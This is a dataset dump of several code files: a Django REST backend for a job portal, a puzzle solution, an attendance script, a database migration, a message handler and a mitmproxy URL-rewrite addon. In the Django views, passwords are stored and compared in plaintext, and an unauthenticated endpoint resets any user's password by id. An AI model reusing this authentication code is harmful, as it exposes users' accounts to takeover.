to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass usertype(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_type.objects.all()\n serializer_class = user_type_serializer\n\n def get(self, request, format=None):\n data = user_type.objects.all().order_by('-createdDate')\n serializer = user_type_serializer(data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass usersaveaccount(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_account.objects.all()\n serializer_class = user_account_serializer\n\n def get(self, request, format=None):\n user_data = user_account.objects.all().order_by('-createdDate')\n serializer = user_account_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n\n user_type_id = request.data.get('user_type_id')\n if user_type_id:\n userObject = user_type.objects.get(pk=user_type_id)\n request.data['isactive'] = True\n serializer = user_account_serializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(user_type_id=userObject)\n user_id = user_account.objects.last()\n userlogObject = user_account.objects.get(pk=user_id.id)\n log_Data={\n 'last_login_date':datetime.datetime.now()\n }\n logserializer = user_log_serializer(data=log_Data)\n if logserializer.is_valid():\n logserializer.save(user_account_id=userlogObject)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass edituseraccount(APIView):\n def get_object(self, pk):\n try:\n return user_account.objects.get(pk=pk)\n except user_account.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = user_account_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, pk, format=None):\n userObject = user_account.objects.get(pk=request.data['id'])\n addmoreUser = self.get_object(pk)\n serializer = user_account_serializer(addmoreUser, data=request.data)\n if serializer.is_valid():\n serializer.save(staff=userObject)\n return Response(serializer.data)\n \nclass userlog(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = user_log.objects.all()\n serializer_class = user_log_serializer\n\n def get(self, request, format=None):\n user_data = user_log.objects.all().order_by('-createdDate')\n serializer = user_log_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n\n\nclass userlogin(APIView):\n def login(request):\n if request.method == 'POST':\n email = request.POST.get('email')\n password = request.POST.get('password')\n\n try:\n user = user_account.objects.get(email=email, password=password)\n # If the query succeeds, a matching user account was found\n return HttpResponse('Login successful')\n except user_account.DoesNotExist:\n # If the query fails, there is no matching user account\n return HttpResponse('Invalid email or password')\n\n # If the request method is not POST, return an empty response\n return HttpResponse()\n\n \nclass forgotpassword(APIView):\n def post(self, request, *args, **kwargs):\n my_model_instance = user_account.objects.get(id=request.data['id'])\n my_model_instance.password = request.data['password']\n my_model_instance.save(update_fields=['password'])\n return Response({'success': True})\n \nclass businessstream(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = business_stream.objects.all()\n serializer_class = business_stream_serializer\n\n def get(self, request, format=None):\n user_data = business_stream.objects.all().order_by('-createdDate')\n serializer = business_stream_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n serializer = business_stream_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass companyadddetails(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = company.objects.all()\n serializer_class = company_serializer\n\n def get(self, request, format=None):\n user_data = company.objects.all().order_by('-createdDate')\n serializer = company_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n company_name = request.data.get('company_name')\n profile_description = request.data.get('profile_description')\n business_stream_id = request.data.get('business_stream_id')\n\n establishment_date = request.data.get('establishment_date')\n company_website_url = request.data.get('company_website_url')\n\n business_stream_id = business_stream.objects.get(id=business_stream_id)\n\n company_data = company(company_name=company_name, profile_description=profile_description, business_stream_id=business_stream_id, \n establishment_date=establishment_date,company_website_url=company_website_url)\n company_data.save() \n\n company_id = company_data.id\n company_id_instance = company.objects.get(id=company_id)\n company_image_data = request.data.get('company_image')\n\n company_image_instance = company_image(company_id=company_id_instance, company_image=company_image_data)\n company_image_instance.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\nclass companyprofile(APIView):\n def get_object(self, pk):\n try:\n return company.objects.get(pk=pk)\n except company.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = company_serializer(data)\n return Response(serializer.data)\n \nclass companysaveimage(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = company_image.objects.all()\n serializer_class = company_image_serializer\n\n def get(self, request, format=None):\n user_data = company_image.objects.all().order_by('-createdDate')\n serializer = company_image_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass postjob(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post.objects.all()\n serializer_class = job_post_serializer\n\n def get(self, request, format=None):\n user_data = job_post.objects.all().order_by('-createdDate')\n serializer = job_post_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n # Extract data from request.data\n street_address = request.data.get('street_address')\n city = request.data.get('city')\n state = request.data.get('state')\n country = request.data.get('country')\n zip = request.data.get('zip')\n jobtypeid=request.data.get('job_type_id')\n companyid=request.data.get('company_id')\n useraccountid=request.data.get('user_account_id')\n \n\n joblocation = job_location(street_address=street_address, city=city, state=state, country=country,zip=zip)\n joblocation.save()\n\n job_type_id = job_type.objects.get(id=jobtypeid)\n company_id = company.objects.get(id=companyid)\n user_account_id=user_account.objects.get(id=useraccountid)\n is_company_name_hidden = request.data.get('is_company_name_hidden')\n job_description = request.data.get('job_description')\n job_location_id = joblocation.id\n created_date=request.data.get('created_date')\n is_active = request.data.get('is_active')\n\n job_location_instance = job_location.objects.get(id=job_location_id)\n\n jobpost=job_post(job_type_id=job_type_id,company_id=company_id,is_company_name_hidden=is_company_name_hidden,\n job_description=job_description,job_location_id=job_location_instance,created_date=created_date,is_active=is_active)\n jobpost.save()\n\n skill_level=request.data.get('skill_level')\n skillsetid=request.data.get('skill_set_id')\n \n skill_set_id=skill_set.objects.get(id=skillsetid)\n job_post_id=jobpost.id\n job_post_instance = job_post.objects.get(id=job_post_id)\n \n jobpostskillset=job_post_skill_set(skill_set_id=skill_set_id,skill_level=skill_level,job_post_id=job_post_instance)\n jobpostskillset.save()\n\n\n\n jobpostactivity=job_post_activity(user_account_id=user_account_id,job_post_id=job_post_instance,apply_date=datetime.datetime.now())\n jobpostactivity.save()\n\n userlog=user_log(user_account_id=user_account_id,last_job_apply_date=datetime.datetime.now())\n userlog.save()\n\n # user_log_instance = user_log.objects.get(user_account_id=user_account_id)\n # user_log_instance.last_job_apply_date = datetime.datetime.now()\n # user_log_instance.save()\n \n return Response(status=status.HTTP_201_CREATED)\n\nclass editjob(APIView):\n def get_object(self, pk):\n try:\n return job_post.objects.get(pk=pk)\n except job_post.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = job_post_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, pk, format=None):\n jobpost = self.get_object(pk)\n \n # Update job_location fields\n joblocation = jobpost.job_location_id\n joblocation.street_address = request.data.get('street_address', joblocation.street_address)\n joblocation.city = request.data.get('city', joblocation.city)\n joblocation.state = request.data.get('state', joblocation.state)\n joblocation.country = request.data.get('country', joblocation.country)\n joblocation.zip = request.data.get('zip', joblocation.zip)\n joblocation.save()\n\n # Update job_post fields\n jobpost.job_type_id = job_type.objects.get(id=request.data.get('job_type_id', jobpost.job_type_id.id))\n jobpost.company_id = company.objects.get(id=request.data.get('company_id', jobpost.company_id.id))\n jobpost.is_company_name_hidden = request.data.get('is_company_name_hidden', jobpost.is_company_name_hidden)\n jobpost.job_description = request.data.get('job_description', jobpost.job_description)\n jobpost.job_location_id = joblocation\n jobpost.created_date = request.data.get('created_date', jobpost.created_date)\n jobpost.is_active = request.data.get('is_active', jobpost.is_active)\n jobpost.save()\n\n # Update job_post_skill_set fields\n jobpostskillset = job_post_skill_set.objects.get(job_post_id=jobpost.id)\n jobpostskillset.skill_set_id = skill_set.objects.get(id=request.data.get('skill_set_id', jobpostskillset.skill_set_id.id))\n jobpostskillset.skill_level = request.data.get('skill_level', jobpostskillset.skill_level)\n jobpostskillset.save()\n\n # Update job_post_activity fields\n jobpostactivity = job_post_activity.objects.get(job_post_id=jobpost.id)\n jobpostactivity.user_account_id = user_account.objects.get(id=request.data.get('user_account_id', jobpostactivity.user_account_id.id))\n jobpostactivity.apply_date = request.data.get('apply_date', jobpostactivity.apply_date)\n jobpostactivity.save()\n\n # Update user_log fields\n userlog = user_log.objects.last()\n userlog.last_job_apply_date = jobpostactivity.apply_date\n userlog.save()\n\n serializer = job_post_serializer(jobpost)\n return Response(serializer.data)\n \n \nclass joblocation(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_location.objects.all()\n serializer_class = job_location_serializer\n\n def get(self, request, format=None):\n user_data = job_location.objects.all().order_by('-createdDate')\n serializer = job_location_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n serializer = job_location_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass educationdetail(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = education_detail.objects.all()\n serializer_class = education_detail_serializer\n\n def get(self, request, format=None):\n user_data = education_detail.objects.all().order_by('-createdDate')\n serializer = education_detail_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass seekerskillset(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = seeker_skill_set.objects.all()\n serializer_class = seeker_skill_set_serializer\n\n def get(self, request, format=None):\n user_data = seeker_skill_set.objects.all().order_by('-createdDate')\n serializer = seeker_skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass jobpostactivity(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post_activity.objects.all()\n serializer_class = job_post_activity_serializer\n\n def get(self, request, format=None):\n user_data = job_post_activity.objects.all().order_by('-createdDate')\n serializer = job_post_activity_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass experincedetail(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = experience_detail.objects.all()\n serializer_class = experience_detail_serializer\n\n def get(self, request, format=None):\n user_data = experience_detail.objects.all().order_by('-createdDate')\n serializer = experience_detail_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass skills(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = skill_set.objects.all()\n serializer_class = skill_set_serializer\n\n def get(self, request, format=None):\n user_data = skill_set.objects.all().order_by('-createdDate')\n serializer = skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass skillset(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_post_skill_set.objects.all()\n serializer_class = job_post_skill_set_serializer\n\n def get(self, request, format=None):\n user_data = job_post_skill_set.objects.all().order_by('-createdDate')\n serializer = job_post_skill_set_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass jobtype(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = job_type.objects.all()\n serializer_class = job_type_serializer\n\n def get(self, request, format=None):\n user_data = job_type.objects.all().order_by('-createdDate')\n serializer = job_type_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \nclass seekerprofile(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = seeker_profile.objects.all()\n serializer_class = seeker_profile_serializer\n\n def get(self, request, format=None):\n user_data = seeker_profile.objects.all().order_by('-createdDate')\n serializer = seeker_profile_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n\n \n def post(self, request, format=None):\n useraccountid=request.data.get('user_account_id')\n\n user_account_id=user_account.objects.get(id=useraccountid)\n\n first_name = request.data.get('first_name')\n last_name = request.data.get('last_name')\n current_salary = request.data.get('current_salary')\n is_annually_monthly = request.data.get('is_annually_monthly')\n currency = request.data.get('currency')\n uploaded_cv = request.data.get('uploaded_cv')\n\n seekerprofile=seeker_profile(user_account_id=user_account_id,first_name=first_name,last_name=last_name,\n current_salary=current_salary,is_annually_monthly=is_annually_monthly,currency=currency,uploaded_cv=uploaded_cv)\n seekerprofile.save()\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n certificate_degree_name = request.data.get('certificate_degree_name')\n major = request.data.get('major')\n institute_university_name = request.data.get('institute_university_name')\n starting_date = request.data.get('starting_date')\n completion_date = request.data.get('completion_date')\n percentage = request.data.get('percentage')\n cgpa = request.data.get('cgpa')\n\n educationdetail=education_detail(user_account_id=user_account_id,certificate_degree_name=certificate_degree_name,major=major,\n institute_university_name=institute_university_name,starting_date=starting_date,completion_date=completion_date,percentage=percentage,cgpa=cgpa)\n educationdetail.save()\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n is_current_job = request.data.get('is_current_job')\n start_date = request.data.get('start_date')\n end_date = request.data.get('end_date')\n job_title = request.data.get('job_title')\n company_name = request.data.get('company_name')\n job_location_city = request.data.get('job_location_city')\n job_location_state = request.data.get('job_location_state')\n job_location_country = request.data.get('job_location_country')\n description = request.data.get('description')\n\n experincedetail=experience_detail(user_account_id=user_account_id,is_current_job=is_current_job,start_date=start_date,\n end_date=end_date,job_title=job_title,company_name=company_name,job_location_city=job_location_city,job_location_state=job_location_state,job_location_country=job_location_country,description=description)\n experincedetail.save()\n\n useraccountid=request.data.get('user_account_id')\n skillsetid=request.data.get('skill_set_id')\n \n skill_set_id=skill_set.objects.get(id=skillsetid)\n user_account_id=user_account.objects.get(id=useraccountid) \n skill_level = request.data.get('skill_level')\n\n seekerskillset=seeker_skill_set(user_account_id=user_account_id,skill_set_id=skill_set_id,skill_level=skill_level)\n seekerskillset.save()\n\n return Response(status=status.HTTP_201_CREATED)\n \nclass trendingnews(APIView):\n # Return a list of all userreg objects serialized using userregSerializer\n\n queryset = trending_news.objects.all()\n serializer_class = trending_news_serializer\n\n def get(self, request, format=None):\n user_data = trending_news.objects.all().order_by('-createdDate')\n serializer = trending_news_serializer(user_data, many=True, context={'request': request})\n return Response(serializer.data)\n \n def post(self, request, format=None):\n\n useraccountid=request.data.get('user_account_id')\n \n user_account_id=user_account.objects.get(id=useraccountid)\n news_title = request.data.get('news_title')\n news_description = request.data.get('news_description')\n news_image = request.data.get('news_image')\n\n trendingnews=trending_news(user_account_id=user_account_id,news_title=news_title,news_description=news_description,\n news_image=news_image)\n trendingnews.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\nclass updatenews(APIView):\n def get_object(self, pk):\n try:\n return trending_news.objects.get(pk=pk)\n except trending_news.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = trending_news_serializer(data)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n # Get the object to update\n obj = self.get_object(pk)\n \n # Update the object with the request data\n serializer = trending_news_serializer(obj, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n # If the serializer is not valid, return an error response\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def delete(self, request, pk, format=None):\n data = self.get_object(pk)\n data.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n \n\nclass editseekrprofile(APIView):\n def get_object(self, pk):\n try:\n return seeker_profile.objects.get(pk=pk)\n except seeker_profile.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n data = self.get_object(pk)\n serializer = seeker_profile_serializer(data)\n return Response(serializer.data)\n \n def put(self, request, format=None):\n user_account_id = request.data.get('user_account_id')\n\n try:\n seeker_profile = seeker_profile.objects.get(user_account_id=user_account_id)\n education_detail = education_detail.objects.get(user_account_id=user_account_id)\n experience_detail = experience_detail.objects.get(user_account_id=user_account_id)\n seeker_skill_set = seeker_skill_set.objects.get(user_account_id=user_account_id)\n\n seeker_profile.first_name = request.data.get('first_name', seeker_profile.first_name)\n seeker_profile.last_name = request.data.get('last_name', seeker_profile.last_name)\n seeker_profile.current_salary = request.data.get('current_salary', seeker_profile.current_salary)\n seeker_profile.is_annually_monthly = request.data.get('is_annually_monthly', seeker_profile.is_annually_monthly)\n seeker_profile.currency = request.data.get('currency', seeker_profile.currency)\n seeker_profile.uploaded_cv = request.data.get('uploaded_cv', seeker_profile.uploaded_cv)\n seeker_profile.save()\n\n education_detail.certificate_degree_name = request.data.get('certificate_degree_name', education_detail.certificate_degree_name)\n education_detail.major = request.data.get('major', education_detail.major)\n education_detail.institute_university_name = request.data.get('institute_university_name', education_detail.institute_university_name)\n education_detail.starting_date = request.data.get('starting_date', education_detail.starting_date)\n education_detail.completion_date = request.data.get('completion_date', education_detail.completion_date)\n education_detail.percentage = request.data.get('percentage', education_detail.percentage)\n education_detail.cgpa = request.data.get('cgpa', education_detail.cgpa)\n education_detail.save()\n\n experience_detail.is_current_job = request.data.get('is_current_job', experience_detail.is_current_job)\n experience_detail.start_date = request.data.get('start_date', experience_detail.start_date)\n experience_detail.end_date = request.data.get('end_date', experience_detail.end_date)\n experience_detail.job_title = request.data.get('job_title', experience_detail.job_title)\n experience_detail.company_name = request.data.get('company_name', experience_detail.company_name)\n experience_detail.job_location_city = request.data.get('job_location_city', experience_detail.job_location_city)\n experience_detail.job_location_state = request.data.get('job_location_state', experience_detail.job_location_state)\n experience_detail.job_location_country = request.data.get('job_location_country', experience_detail.job_location_country)\n experience_detail.description = request.data.get('description', experience_detail.description)\n experience_detail.save()\n\n skill_set_id = request.data.get('skill_set_id', seeker_skill_set.skill_set_id)\n skill_level = request.data.get('skill_level', seeker_skill_set.skill_level)\n seeker_skill_set.skill_set_id = skill_set_id\n seeker_skill_set.skill_level = skill_level\n seeker_skill_set.save()\n\n return Response(status=status.HTTP_200_OK)\n\n except (seeker_profile.DoesNotExist, education_detail.DoesNotExist, experience_detail.DoesNotExist, seeker_skill_set.DoesNotExist):\n return Response(status=status.HTTP_404_NOT_FOUND)\n","repo_name":"zeeyan23/PacificManpower-Backend-","sub_path":"spacificmanpower/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":27630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11067046060","text":"import aocutils\n\n\ndef deterministic_rolls():\n i = 1\n while True:\n if i < 98:\n yield i * 3 + 3\n i += 3\n else:\n s = 0\n for _ in range(3):\n s += i\n i += 1\n if i > 100:\n i = 1\n yield s\n\ndef main(file):\n print(\"RUNNING\", file)\n lines = list(aocutils.readlines(file))\n p1 = int(lines[0][-1])\n p2 = int(lines[1][-1])\n dice = deterministic_rolls()\n p1_score = 0\n p2_score = 0\n for i in range(9999):\n roll = next(dice)\n p1 = ((p1 + roll - 1) % 10) + 1\n p1_score += p1\n if p1_score >= 1000:\n print(p2_score, '*', (i * 6 + 3))\n print(p2_score * (i * 6 + 3))\n return\n\n roll = next(dice)\n p2 = ((p2 + roll - 1) % 10) + 1\n p2_score += p2\n if p2_score >= 1000:\n print(p1_score, '*', (i * 6 + 6))\n print(p1_score * (i * 6 + 6))\n return\n\n\nif __name__ == '__main__':\n main(\"example.txt\")\n print(739785, \"expected\")\n main(\"input.txt\")\n","repo_name":"martenbr/aoc","sub_path":"aoc2021/dec21/dirac1.py","file_name":"dirac1.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18248181356","text":"import cv2\nimport pickle\nimport pandas as pd\nfrom PIL import Image\nfrom src.Utils import encoding\nfrom src.components.DBStudentInsert import insertstudent\n\ndf = pd.read_csv(r'data/attendance.csv',index_col='Index')\n\ndef addStudent():\n '''Adds a new student's attendance record in Database & his/her image in Image folder'''\n\n name = input('Enter your name: ')\n if name not in df['Student_name'].values:\n eng = int(input('English Attendance: '))\n math = int(input('Math Attendance: '))\n sci = int(input('Science Attendance: '))\n\n df.loc[len(df.index)] = [name,eng,math,sci]\n df.to_csv(r'data/attendance.csv')\n print(df)\n\n insertstudent(name,eng,math,sci)\n\n cap=cv2.VideoCapture(0)\n while True:\n _,frame=cap.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n img = Image.fromarray(frame)\n img.convert('RGB')\n img.save(f'Images\\{name}.jpg')\n\n encoding(name)\n\n cv2.imshow('Face Cropper',frame)\n\n if (cv2.waitKey(1) & 0xFF == ord('q')):\n break\n cap.release()\n cv2.destroyAllWindows()\n\n with open(r'data/Names.pkl','wb') as file:\n pickle.dump(name,file)\n\n print('Name added sucessfully')\n else: \n return print(\"Name already present inside DB\")","repo_name":"sVinit108/Automatic_Attendance_System_Using_Face_Recognition","sub_path":"src/components/addStudent.py","file_name":"addStudent.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40537018203","text":"\"\"\"add tool feature tables\n\nRevision ID: defbda3bf2b5\nRevises: 39e860a11b05\nCreate Date: 2020-09-01 20:12:57.300147\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'defbda3bf2b5'\ndown_revision = '39e860a11b05'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n m = sa.MetaData(op.get_bind())\n m.reflect()\n if \"next_id\" in m.tables:\n with op.batch_alter_table(\"next_id\") as batch_op:\n batch_op.add_column(sa.Column(\"tool_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"feature_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"tool_feature_id\", sa.Integer, server_default=sa.null()))\n batch_op.add_column(sa.Column(\"tool_feature_method_id\", sa.Integer, server_default=sa.null()))\n op.create_table(\n \"tool\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"name\", sa.String(155), nullable=False),\n sa.Column(\"description\", sa.String(255), server_default=sa.null()),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n )\n op.create_table(\n \"feature\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"parameter_definition_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"description\", sa.String(255), server_default=sa.null()),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"parameter_definition_id\", \"parameter_value_list_id\"),\n sa.ForeignKeyConstraint(\n (\"parameter_definition_id\", \"parameter_value_list_id\"),\n (\"parameter_definition.id\", \"parameter_definition.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n op.create_table(\n \"tool_feature\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"tool_id\", sa.Integer, sa.ForeignKey(\"tool.id\")),\n sa.Column(\"feature_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"required\", sa.Boolean(name=\"required\"), server_default=sa.false(), nullable=False),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"tool_id\", \"feature_id\"),\n sa.ForeignKeyConstraint(\n (\"feature_id\", \"parameter_value_list_id\"),\n (\"feature.id\", \"feature.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n op.create_table(\n \"tool_feature_method\",\n sa.Column(\"id\", sa.Integer, primary_key=True),\n sa.Column(\"tool_feature_id\", sa.Integer, nullable=False),\n sa.Column(\"parameter_value_list_id\", sa.Integer, nullable=False),\n sa.Column(\"method_index\", sa.Integer),\n sa.Column(\"commit_id\", sa.Integer, sa.ForeignKey(\"commit.id\")),\n sa.UniqueConstraint(\"tool_feature_id\", \"method_index\"),\n sa.ForeignKeyConstraint(\n (\"tool_feature_id\", \"parameter_value_list_id\"),\n (\"tool_feature.id\", \"tool_feature.parameter_value_list_id\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n sa.ForeignKeyConstraint(\n (\"parameter_value_list_id\", \"method_index\"),\n (\"parameter_value_list.id\", \"parameter_value_list.value_index\"),\n onupdate=\"CASCADE\",\n ondelete=\"CASCADE\",\n ),\n )\n\n\ndef downgrade():\n pass\n","repo_name":"spine-tools/Spine-Database-API","sub_path":"spinedb_api/alembic/versions/defbda3bf2b5_add_tool_feature_tables.py","file_name":"defbda3bf2b5_add_tool_feature_tables.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"43378373806","text":"from typing import AnyStr, Dict\n\nimport kombu_batteries_included\nfrom marshmallow import INCLUDE, Schema, fields\nfrom she_logging import logger\n\nfrom dhos_async_adapter.clients import encounters_api\nfrom dhos_async_adapter.helpers import actions\nfrom dhos_async_adapter.helpers.actions import ActionsMessageNoConnectorId\nfrom dhos_async_adapter.helpers.validation import validate_message_body_dict\n\nROUTING_KEY = \"dhos.DM000004\"\n\n\nclass ObservationSet(Schema):\n class Meta:\n unknown = INCLUDE\n\n encounter_id = fields.String(required=True)\n\n\nclass ProcessObservationSetAction(Schema):\n observation_set = fields.Nested(ObservationSet, required=True)\n\n\ndef process(body: AnyStr) -> None:\n \"\"\"\n - Summary: Appends encounter information from Encounters API to a published observation set notification.\n - Routing Key: dhos.DM000004\n - Body: A group of actions in the format published by the Connector API service.\n - Notes: Part of the chain that results in an ORU HL7 message. Results in an dhos.DM000005 message being published.\n - Endpoint(s):\n - GET /dhos-encounters/dhos/v1/encounter/\n - POST /dhos-encounters/dhos/v2/encounter\n - PATCH /dhos-encounters/dhos/v1/encounter/\n \"\"\"\n logger.info(\n \"Received observation set notification message (%s)\",\n ROUTING_KEY,\n )\n\n # Load and validate message body.\n logger.debug(\n \"Observation set notification message body (%s)\",\n ROUTING_KEY,\n extra={\"message_body\": body},\n )\n actions_message: Dict = validate_message_body_dict(\n body=body, schema=ActionsMessageNoConnectorId, unknown=INCLUDE\n )\n\n action_data = actions.extract_action(\n message=actions_message, action_name=\"process_observation_set\"\n )[\"data\"]\n\n validated_action_data: Dict = ProcessObservationSetAction().load(\n action_data, unknown=INCLUDE\n )\n\n # Get the encounter details\n encounter: Dict = encounters_api.get_encounter_by_uuid(\n encounter_uuid=validated_action_data[\"observation_set\"][\"encounter_id\"]\n )\n validated_action_data[\"encounter\"] = encounter\n\n processed_msg = {\n \"actions\": [{\"name\": \"process_observation_set\", \"data\": validated_action_data}]\n }\n kombu_batteries_included.publish_message(\n routing_key=\"dhos.DM000005\", body=processed_msg\n )\n","repo_name":"huma-engineering/polaris-async-adapter","sub_path":"dhos_async_adapter/callbacks/encounter_obs_set_notification.py","file_name":"encounter_obs_set_notification.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26839511362","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\napp_name = 'weather'\n\nurlpatterns = [\n path('', views.index, name='weather_list'),\n path('detail//', views.CityDetailView.as_view(), name='city_detail'),\n path('delete//', views.CityDeleteView.as_view(), name='city_delete'),\n path('new/', views.CityCreateView.as_view(), name='new_city'),\n]\n","repo_name":"erinrosenbaum/my_website","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16230549550","text":"import re\nimport typing\n\nfrom mitmproxy import exceptions, http\nfrom mitmproxy import ctx\nfrom mitmproxy.addons.modifyheaders import parse_modify_spec, ModifySpec\n\n\nclass MapRemote:\n def __init__(self):\n self.replacements: typing.List[ModifySpec] = []\n\n def load(self, loader):\n loader.add_option(\n \"map_remote\", typing.Sequence[str], [],\n \"\"\"\n Replacement pattern of the form \"[/flow-filter]/regex/[@]replacement\", where\n the separator can be any character. The @ allows to provide a file path that\n is used to read the replacement string.\n \"\"\"\n )\n\n def configure(self, updated):\n if \"map_remote\" in updated:\n self.replacements = []\n for option in ctx.options.map_remote:\n try:\n spec = parse_modify_spec(option, True)\n except ValueError as e:\n raise exceptions.OptionsError(f\"Cannot parse map_remote option {option}: {e}\") from e\n\n self.replacements.append(spec)\n\n def request(self, flow: http.HTTPFlow) -> None:\n if flow.reply and flow.reply.has_message:\n return\n for spec in self.replacements:\n if spec.matches(flow):\n try:\n replacement = spec.read_replacement()\n except IOError as e:\n ctx.log.warn(f\"Could not read replacement file: {e}\")\n continue\n\n url = flow.request.pretty_url.encode(\"utf8\", \"surrogateescape\")\n new_url = re.sub(spec.subject, replacement, url)\n # this is a bit messy: setting .url also updates the host header,\n # so we really only do that if the replacement affected the URL.\n if url != new_url:\n flow.request.url = 